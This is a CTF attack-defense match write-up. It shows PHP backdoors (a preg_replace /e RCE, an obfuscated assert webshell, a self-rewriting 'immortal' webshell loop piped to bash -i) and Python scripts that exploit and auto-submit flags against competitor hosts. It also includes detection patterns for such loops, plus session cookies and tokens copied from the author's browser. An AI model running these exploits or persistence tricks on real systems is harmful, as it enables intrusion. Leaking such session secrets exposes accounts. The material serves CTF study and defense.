
7.10bugkuawd


We took second place this time.


Defense phase

First connect to the server with Xshell (SSH on port 2222).

Then dump the entire web directory:

```bash
tar -cvf web.tar /var/www/html
```

or

```bash
zip -q -r web.zip /var/www/html
```

and move the backup somewhere outside the web root:

```bash
mv web.tar /tmp
mv web.zip /home/xxx
```

The database needs backing up too. Note that `-p` takes the password with no space after it; `-p db_passwd` would prompt for a password interactively and treat `db_passwd` as the database name:

```bash
mysqldump -udb_user -pdb_passwd databasename > bak.sql
```

Download it to the local machine with Xftp, then scan it with D盾.


Then patch config.php, upload.php, and the 1.php files below.

upload.php originally looked like this (no check at all: any file name, any content, written straight into `uploads/`):

```php
<?php
$uploaddir = 'uploads/'; 
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)){
 echo "File is valid, and was successfully uploaded.\n";
} 
else {
 echo "File uploading failed.\n";
}
?>
```

We added an extension whitelist:

```php
<?php
$uploaddir = 'uploads/'; 
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
// Only allow image extensions (checked against the text after the last dot)
if (preg_match("/png|jpg|jpeg|gif/is",(substr($_FILES["userfile"]["name"],strrpos($_FILES["userfile"]["name"], '.')+1))))
{
    # allowed
}
else{
    die();
}
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)){

 echo "File is valid, and was successfully uploaded.\n";
} 
else {
 echo "File uploading failed.\n";
}
?>
```

One caveat: the pattern is unanchored, so it only requires the last extension to contain one of those substrings. `shell.php.jpg` still passes, and on an Apache host that maps `.php` with `AddHandler` a file with that name can still be executed. Anchoring the pattern (`/^(png|jpe?g|gif)$/i`) and renaming the stored file to a random name with the whitelisted extension closes that off.
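To make the weakness in that whitelist concrete, here is an added example (my code, not the post's, and not a drop-in for the PHP handler) that re-implements the same extension check in Python, puts the anchored form beside it, and runs both over a constructed list of upload names. It also reproduces PHP's `strrpos` returning `false` for a name with no dot, which makes `false + 1` equal `1`. `safe_filename` is my suggested replacement: keep the strict check and discard the client-chosen base name entirely.

```python
import re
import secrets
from typing import List, Optional

# The page's check, transcribed from upload.php: an unanchored, case-insensitive
# search over the text after the last dot.
PAGE_PATTERN = re.compile(r"png|jpg|jpeg|gif", re.I | re.S)
# Tightened form: the whole extension must be exactly one of the image types.
STRICT_PATTERN = re.compile(r"^(png|jpe?g|gif)$", re.I)


def last_ext(name: str) -> str:
    """Mimic substr($name, strrpos($name, '.') + 1).
    With no dot, PHP's strrpos returns false, and false + 1 is 1, so the
    'extension' becomes the whole name minus its first character."""
    dot = name.rfind(".")
    return name[dot + 1:] if dot != -1 else name[1:]


def page_check(name: str) -> bool:
    """The post's whitelist: substring match on the last extension."""
    return PAGE_PATTERN.search(last_ext(name)) is not None


def strict_check(name: str) -> bool:
    """Anchored whitelist: the last extension must be exactly an image type."""
    return STRICT_PATTERN.match(last_ext(name)) is not None


def safe_filename(name: str) -> Optional[str]:
    """Accept only a strict extension and replace the client-chosen base name with
    a random one, so neither the name nor an earlier '.php' segment survives."""
    if not strict_check(name):
        return None
    return secrets.token_hex(8) + "." + last_ext(name).lower()


# Constructed upload names covering the cases that matter.
CONSTRUCTED = [
    "avatar.png", "photo.JPG", "shell.php", "shell.phtml",
    "shell.php.jpg",   # double extension: last part is jpg, both checks pass
    "shell.jpgphp",    # the unanchored search finds 'jpg' inside 'jpgphp'
    "noext",
]


def accepted(checker) -> List[str]:
    """Names from CONSTRUCTED that the given checker lets through."""
    return [n for n in CONSTRUCTED if checker(n)]


if __name__ == "__main__":
    print("page  :", accepted(page_check))
    print("strict:", accepted(strict_check))
    print("stored as:", safe_filename("shell.php.jpg"))
```

Even the anchored check accepts `shell.php.jpg`, which is why the rename matters: once the stored name is `<random>.jpg` there is no `.php` segment left for the web server to act on. Disabling PHP execution inside `uploads/` is the other half of that fix.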

Then this part of config.php:

```php
<?php
/**
 * Created by : PhpStorm
 * User: Aman
 * 我是一匹狼,仰望着星空却找不到月亮
 * Date: 2021-02-22 17:05
 */


$e = $_REQUEST['www'];
$arr = array($_POST['aman'] => '|.*|e',);
array_walk($arr, "preg_replace", '');
```

We simply commented it out; later we also scored off this same hole on other teams. Why it is remote code execution: `array_walk` invokes the callback as `preg_replace($value, $key, $userdata)`, so the last line is really `preg_replace('|.*|e', $_POST['aman'], '')`. With the `e` modifier, PCRE evaluates the replacement string as PHP code, so whatever is sent in `aman` runs. `$_REQUEST['www']` is assigned and never used. This only works on PHP 5.x: the `/e` modifier was deprecated in 5.5 and removed in 7.0.

Then the two 1.php files:

```php
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>
```

They are identical, so we commented them out. `explode` splits `a#s#s#e#r#t` into single letters that are concatenated back into `assert`, which is then called as a variable function on `$_GET['s']`. Through PHP 7.x a string passed to `assert()` is evaluated as code (deprecated from 7.2), so `?s=system('cat /flag')` executes; PHP 8 no longer evaluates string assertions.

The pwn hardening was left to xixi师傅.

Attack phase

Round one: first scan every team's IP.

```python
import requests


def check_url(url):
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print(f"Valid URL: {url}")  # only print live hosts
            return True
    except requests.exceptions.RequestException:
        pass  # unreachable hosts are skipped silently
    return False


def main():
    # Each team's box is exposed as 192-168-1-X.pvp6199.bugku.cn
    base_url = "http://192-168-1-{}.pvp6199.bugku.cn"

    # Range to iterate for X (1-255)
    start = 1
    end = 255

    for x in range(start, end + 1):
        url = base_url.format(x)
        check_url(url)  # check only; invalid URLs are not printed


if __name__ == "__main__":
    main()
```

We first looked for upload.html and tried uploading, but none of the targets accepted it. We lost no points in round one either.

In round two we found that many teams had not hardened config.php.

POST the parameters directly (`www` is unused by the vulnerable code and can be left empty):

```
aman=system('cat /flag')&www=
```

After that it was just a matter of running a script.

```python
import requests

urls = [
    "http://192-168-1-19.pvp6199.bugku.cn",
    "http://192-168-1-64.pvp6199.bugku.cn",
    "http://192-168-1-75.pvp6199.bugku.cn",
    "http://192-168-1-94.pvp6199.bugku.cn",
    "http://192-168-1-95.pvp6199.bugku.cn",
    "http://192-168-1-119.pvp6199.bugku.cn",
    "http://192-168-1-128.pvp6199.bugku.cn",
    "http://192-168-1-133.pvp6199.bugku.cn",
    "http://192-168-1-148.pvp6199.bugku.cn",
    "http://192-168-1-154.pvp6199.bugku.cn",
    "http://192-168-1-175.pvp6199.bugku.cn",
    "http://192-168-1-188.pvp6199.bugku.cn",
    "http://192-168-1-212.pvp6199.bugku.cn",
    "http://192-168-1-246.pvp6199.bugku.cn",
    "http://192-168-1-250.pvp6199.bugku.cn",
]

path = "/admin/config.php"

# POST data (code executed through the preg_replace /e gadget)
data = {
    "aman": 'system("cat /flag")',
    "www": ""
}

# Iterate over all targets
for base_url in urls:
    url = base_url + path
    try:
        resp = requests.post(url, data=data, timeout=5)
        if "flag" in resp.text.lower():  # case-insensitive check for the keyword
            print(f"==== flag found at {url} ====")
            print(resp.text.strip())
            print("\n" + "="*50 + "\n")
    except Exception as e:
        print(f"[!] {url} request failed: {e}")
```

Later we realized submission could be automated as well: capture the submit request in Burp and have the script replay it.

```python
import requests

# Target list
urls = [
    "http://192-168-1-19.pvp6199.bugku.cn",
    "http://192-168-1-64.pvp6199.bugku.cn",
    "http://192-168-1-75.pvp6199.bugku.cn",
    "http://192-168-1-94.pvp6199.bugku.cn",
    "http://192-168-1-95.pvp6199.bugku.cn",
    "http://192-168-1-119.pvp6199.bugku.cn",
    "http://192-168-1-128.pvp6199.bugku.cn",
    "http://192-168-1-133.pvp6199.bugku.cn",
    "http://192-168-1-148.pvp6199.bugku.cn",
    "http://192-168-1-154.pvp6199.bugku.cn",
    "http://192-168-1-175.pvp6199.bugku.cn",
    "http://192-168-1-188.pvp6199.bugku.cn",
    "http://192-168-1-212.pvp6199.bugku.cn",
    "http://192-168-1-246.pvp6199.bugku.cn",
    "http://192-168-1-250.pvp6199.bugku.cn",
]

path = "/admin/config.php"

# POST data for the command execution
data = {
    "aman": 'system("cat /flag")',
    "www": ""
}

# Flag submission settings (headers and tokens copied from the Burp capture).
# If the submit response prints as binary junk, drop "Accept-Encoding": requests
# only decodes brotli ("br") when the brotli package is installed.
submit_url = "https://ctf.bugku.com/pvp/submit.html"
submit_headers = {
    "Host": "ctf.bugku.com",
    "Cookie": "Hm_lvt_97426e6b69219bfb34f8a3a1058dc596=1752064959,1752144678; X-CSRF-TOKEN=5f862444be2abe635553431f5dbe3cc7; PHPSESSID=510da7c779ed3187e1e367298ca84438; autoLogin=kdoN64ND3Xo2hQQsxG98rnS9Z0dSe7yDQ6%2BPQQyFxJceBfhGi2cTEn2DEIn1%2BnAp90bvuC2oPvmUmZ8JberY0rkxG1ceHHz4Dg0bWvElwk4efWo1ot0DhQ3sP0GP%2BkzkXBEteb0agHTh8g; Hm_lpvt_97426e6b69219bfb34f8a3a1058dc596=1752150215; HMACCOUNT=BF67DCC11FFB9723",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Csrf-Token": "5f862444be2abe635553431f5dbe3cc7",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://ctf.bugku.com",
    "Referer": "https://ctf.bugku.com/pvp/match/id/6199.html",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Priority": "u=0",
    "Te": "trailers"
}
submit_data = {
    "id": "6199",
    "token": "b34932d2ac71a030ae821a648f2e535b"
}

# Iterate over all targets
for base_url in urls:
    url = base_url + path
    try:
        # Run the command and try to read the flag
        resp = requests.post(url, data=data, timeout=5)
        if "flag" in resp.text.lower():
            flag = resp.text.strip()
            print(f"==== flag found at {url} ====")
            print(flag)

            # Extract the flag (assumed format flag{...}). Look for the closing
            # brace after "flag{", not the first "}" anywhere in the response;
            # otherwise any "}" printed before the flag yields an empty slice.
            start = flag.find("flag{")
            end = flag.find("}", start) if start != -1 else -1
            if start != -1 and end != -1:
                submit_data["flag"] = flag[start:end + 1]

                # Submit the flag
                try:
                    submit_resp = requests.post(
                        submit_url,
                        headers=submit_headers,
                        data=submit_data,
                        timeout=5
                    )
                    print("\n=== submit result ===")
                    print(submit_resp.text)
                except Exception as submit_e:
                    print(f"[!] flag submission failed: {submit_e}")

            print("\n" + "="*50 + "\n")
    except Exception as e:
        print(f"[!] {url} request failed: {e}")
```

But some teams had fixed this one, so we switched to the 1.php hole:

```
/admin/img/editor/2x/1.php?s=system('cat /flag')
```

The vast majority of teams had not fixed it. Automated script that re-runs the attack on a delay and submits:

```python
import requests
import time
from datetime import datetime

# Target list
urls = [
    "http://192-168-1-19.pvp6199.bugku.cn",
    "http://192-168-1-64.pvp6199.bugku.cn",
    "http://192-168-1-75.pvp6199.bugku.cn",
    "http://192-168-1-94.pvp6199.bugku.cn",
    "http://192-168-1-95.pvp6199.bugku.cn",
    "http://192-168-1-119.pvp6199.bugku.cn",
    "http://192-168-1-128.pvp6199.bugku.cn",
    "http://192-168-1-133.pvp6199.bugku.cn",
    "http://192-168-1-148.pvp6199.bugku.cn",
    "http://192-168-1-154.pvp6199.bugku.cn",
    "http://192-168-1-175.pvp6199.bugku.cn",
    "http://192-168-1-188.pvp6199.bugku.cn",
    "http://192-168-1-212.pvp6199.bugku.cn",
    "http://192-168-1-246.pvp6199.bugku.cn",
    "http://192-168-1-250.pvp6199.bugku.cn",
]

path = "/admin/img/editor/2x/1.php?s=system('cat /flag')"

# Flag submission settings (headers and tokens copied from the Burp capture).
# If the submit response prints as binary junk, drop "Accept-Encoding": requests
# only decodes brotli ("br") when the brotli package is installed.
submit_url = "https://ctf.bugku.com/pvp/submit.html"
submit_headers = {
    "Host": "ctf.bugku.com",
    "Cookie": "Hm_lvt_97426e6b69219bfb34f8a3a1058dc596=1752064959,1752144678; X-CSRF-TOKEN=5f862444be2abe635553431f5dbe3cc7; PHPSESSID=510da7c779ed3187e1e367298ca84438; autoLogin=kdoN64ND3Xo2hQQsxG98rnS9Z0dSe7yDQ6%2BPQQyFxJceBfhGi2cTEn2DEIn1%2BnAp90bvuC2oPvmUmZ8JberY0rkxG1ceHHz4Dg0bWvElwk4efWo1ot0DhQ3sP0GP%2BkzkXBEteb0agHTh8g; Hm_lpvt_97426e6b69219bfb34f8a3a1058dc596=1752150215; HMACCOUNT=BF67DCC11FFB9723",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Csrf-Token": "5f862444be2abe635553431f5dbe3cc7",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://ctf.bugku.com",
    "Referer": "https://ctf.bugku.com/pvp/match/id/6199.html",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Priority": "u=0",
    "Te": "trailers"
}
submit_data = {
    "id": "6199",
    "token": "b34932d2ac71a030ae821a648f2e535b"
}

# Delay between rounds, in seconds
DELAY = 60

def scan_and_submit():
    print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] starting a new scan round...")

    for base_url in urls:
        url = base_url + path
        try:
            # Run the command and try to read the flag
            resp = requests.get(url, timeout=5)
            if "flag" in resp.text.lower():
                flag = resp.text.strip()
                print(f"\n==== flag found at {url} ====")
                print(flag)

                # Extract the flag (assumed format flag{...}). Look for the
                # closing brace after "flag{", not the first "}" in the response.
                start = flag.find("flag{")
                end = flag.find("}", start) if start != -1 else -1
                if start != -1 and end != -1:
                    submit_data["flag"] = flag[start:end + 1]

                    # Submit the flag
                    try:
                        submit_resp = requests.post(
                            submit_url,
                            headers=submit_headers,
                            data=submit_data,
                            timeout=5
                        )
                        print("\n=== submit result ===")
                        print(submit_resp.text)
                    except Exception as submit_e:
                        print(f"[!] flag submission failed: {submit_e}")

                print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"[!] {url} request failed: {e}")

# Main loop
if __name__ == "__main__":
    print(f"Script started; targets will be scanned every {DELAY} seconds...")
    print("Press Ctrl+C to stop")

    try:
        while True:
            scan_and_submit()
            print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] round finished, sleeping {DELAY}s before the next one...")
            time.sleep(DELAY)
    except KeyboardInterrupt:
        print("\nScript stopped")
```
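The scan, exploit and submit scripts above can be folded into one loop. The following is an added example, my code rather than the post's, that does that with three changes a practitioner would want: flags are pulled out with a regular expression instead of slicing to the first `}` (the `page_slice` function reproduces the original slicing so the failure mode is visible), each flag is submitted once per match rather than re-sent every round, and targets are hit in parallel so a hung host does not stall the round. It assumes the submit form fields captured by the author (`id`, `token`, `flag`), the `flag{...}` format, and that the session cookie, CSRF header and submit token are supplied through environment variables `BUGKU_COOKIE`, `BUGKU_CSRF` and `BUGKU_SUBMIT_TOKEN` (names of my choosing). Only the first three targets from the list above are kept to keep it short.

```python
import os
import re
import time
from concurrent.futures import ThreadPoolExecutor

import requests

# Targets and payloads taken from the write-up (first three hosts only).
TARGETS = [
    "http://192-168-1-19.pvp6199.bugku.cn",
    "http://192-168-1-64.pvp6199.bugku.cn",
    "http://192-168-1-75.pvp6199.bugku.cn",
]
# (method, path, query params, form data), tried in order until one yields a flag
PAYLOADS = [
    ("GET", "/admin/img/editor/2x/1.php", {"s": "system('cat /flag')"}, None),
    ("POST", "/admin/config.php", None, {"aman": "system('cat /flag')", "www": ""}),
]
SUBMIT_URL = "https://ctf.bugku.com/pvp/submit.html"
MATCH_ID = "6199"
FLAG_RE = re.compile(r"flag\{[^}]+\}")


def page_slice(text):
    """The original extraction: slice from 'flag{' to the FIRST '}' in the text.
    Returns '' whenever some '}' (a PHP warning, HTML) precedes 'flag{'."""
    if "flag{" in text and "}" in text:
        return text[text.index("flag{"):text.index("}") + 1]
    return ""


def extract_flags(text):
    """Every flag{...} in the response, in order, duplicates removed."""
    out = []
    for f in FLAG_RE.findall(text):
        if f not in out:
            out.append(f)
    return out


def new_flags(flags, submitted):
    """Keep only flags not yet submitted this match, and record them."""
    fresh = [f for f in flags if f not in submitted]
    submitted.update(fresh)
    return fresh


def exploit(session, base):
    """Run each payload against one target; return flags from the first that works."""
    for method, path, params, data in PAYLOADS:
        try:
            r = session.request(method, base + path, params=params, data=data, timeout=5)
        except requests.RequestException:
            continue
        flags = extract_flags(r.text)
        if flags:
            return flags
    return []


def submit(session, flag):
    """Replay the captured submit request; credentials come from the environment (assumed)."""
    headers = {
        "Cookie": os.environ["BUGKU_COOKIE"],
        "X-Csrf-Token": os.environ["BUGKU_CSRF"],
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"https://ctf.bugku.com/pvp/match/id/{MATCH_ID}.html",
    }
    data = {"id": MATCH_ID, "token": os.environ["BUGKU_SUBMIT_TOKEN"], "flag": flag}
    return session.post(SUBMIT_URL, headers=headers, data=data, timeout=5).text


def run_round(session, submitted):
    """Exploit all targets in parallel, submit unseen flags, return {target: flag}."""
    results = {}
    with ThreadPoolExecutor(max_workers=8) as pool:
        for base, flags in zip(TARGETS, pool.map(lambda b: exploit(session, b), TARGETS)):
            for f in new_flags(flags, submitted):
                results[base] = f
                print(base, f, submit(session, f))
    return results


if __name__ == "__main__":
    s = requests.Session()
    submitted = set()
    while True:
        print(time.strftime("%H:%M:%S"), "round:", run_round(s, submitted))
        time.sleep(60)
```

The `submitted` set persists across rounds; since each round issues fresh flags, a new flag is always submitted and an unchanged one (a target that has not rotated yet) is not re-sent.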

In the later rounds we noticed that the team “不爆零就是胜利” was attacking us every single round, and we never found where the problem was.

Then the number of flags the script submitted dropped by two, which meant some teams had patched. Only at that point did we remember that we should have planted an immortal webshell (不死马) earlier. We went to look at the processes on the boxes we had already compromised:

```bash
ps aux
```

We found another team's long bash command that rewrites a webshell every 0.2 seconds, and naturally collected it. `{xxd,-r,-p}` and `{bash,-i}` are bash brace expansions for `xxd -r -p` and `bash -i`, a way of writing the pipeline without spaces: the payload is hex-decoded and fed into an interactive bash. The loop drops a hidden `.php` file under `/app`, gated by the md5 of a `key` POST parameter, which `eval`s the `a` parameter:

```bash
sh -c bash -c '{
    while true;
    do 
        echo '<?php $key=$_POST["key"];$keyhash=md5($key);if($keyhash==="5e9cd18f116f0a5031fbdb5a844f43e1") {eval($_POST["a"]);}echo"file not find."; ?>' > /app/.e10ded9685c604d63c1f800e9dfc0221.php;
        chmod 700 /app/.e10ded9685c604d63c1f800e9dfc0221.php;
        sleep 0.2;
    done;
}' | {xxd,-r,-p} | {bash,-i}
```
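A loop like that is exactly what the defense side should be scanning for each round. Here is an added example (my code, not from the post) of the detection logic run over a constructed `ps aux` listing that contains the rewrite loop above, its child `sleep`, and two benign processes. Each command line is scored against indicators drawn from that loop (an infinite loop, inline PHP source, a hidden `.php` in the web root, a sub-second sleep, brace-expansion obfuscation, a decoder piped into a shell); a process that matches two or more is reported together with the files it writes via redirection. The process-list sample, the indicator list and the two-indicator threshold are my assumptions.

```python
import re

# Constructed `ps aux` sample: init, Apache, the attacker's rewrite loop from the
# write-up, and the loop's child `sleep`.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  22000  4000 ?        Ss   10:00   0:00 /sbin/init
www-data  2145  0.0  0.3 210000 12000 ?        S    10:05   0:00 /usr/sbin/apache2 -k start
www-data  2390  0.2  0.0   4500  1200 ?        S    10:07   0:01 sh -c bash -c '{ while true; do echo '<?php eval($_POST["a"]); ?>' > /app/.e10ded9685c604d63c1f800e9dfc0221.php; chmod 700 /app/.e10ded9685c604d63c1f800e9dfc0221.php; sleep 0.2; done; }' | {xxd,-r,-p} | {bash,-i}
www-data  2391  0.0  0.0   4300   800 ?        S    10:07   0:00 sleep 0.2
"""

# (label, pattern): traits of the immortal-shell loop seen in the write-up
INDICATORS = [
    ("infinite loop", re.compile(r"while\s+(true|:|1)")),
    ("writes PHP source", re.compile(r"<\?php")),
    ("hidden .php in web root", re.compile(r"/\.[A-Za-z0-9_]+\.php")),
    ("sub-second sleep", re.compile(r"sleep\s+0\.\d+")),
    ("brace-expansion obfuscation", re.compile(r"\{[^{}\s]+,[^{}\s]+\}")),
    ("decoder piped to a shell", re.compile(r"(xxd[\s,]+-r|base64[\s,]+-d)")),
]


def parse_ps(text):
    """Return (pid, user, command) rows; COMMAND is the 11th column of `ps aux`."""
    rows = []
    for line in text.splitlines()[1:]:
        cols = line.split(None, 10)
        if len(cols) == 11:
            rows.append((int(cols[1]), cols[0], cols[10]))
    return rows


def reasons(cmd):
    """Labels of every indicator the command line matches."""
    return [label for label, rx in INDICATORS if rx.search(cmd)]


def dropped_paths(cmd):
    """Absolute paths the command writes to with shell redirection."""
    return re.findall(r">\s*(/[^\s;|&]+)", cmd)


def audit(ps_text, threshold=2):
    """Map pid -> {user, reasons, drops} for processes at or above the threshold."""
    report = {}
    for pid, user, cmd in parse_ps(ps_text):
        why = reasons(cmd)
        if len(why) >= threshold:
            report[pid] = {"user": user, "reasons": why,
                           "drops": sorted(set(dropped_paths(cmd)))}
    return report


def remediation(report):
    """Shell commands in the order they must run: kill the writer first, then
    delete what it drops. Deleting first is pointless; the loop rewrites the
    file within 0.2 s."""
    cmds = []
    for pid, info in report.items():
        cmds.append(f"kill -9 {pid}")
        cmds += [f"rm -f {p}" for p in info["drops"]]
    return cmds


if __name__ == "__main__":
    found = audit(SAMPLE_PS)
    for pid, info in found.items():
        print(pid, info["user"], ", ".join(info["reasons"]), info["drops"])
    print("\n".join(remediation(found)))
```

The child `sleep 0.2` matches only one indicator and is deliberately not reported: killing it does nothing, the parent loop respawns it. On a live box run this against `ps aux` output and then repeat the audit after remediation; if the loop comes back, the writer is being restarted from somewhere else (cron, a service, or a binary of the kind the post describes at the end), and that is what to hunt next.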

Near the very end we checked the processes on our own box

and only then discovered that a binary had been planted for persistence; the process could not be killed. After the match we learned that phpMyAdmin had a weak password we never changed: the attacker logged in through it, wrote a webshell, and then set up persistence.

Licensed under 9u_l3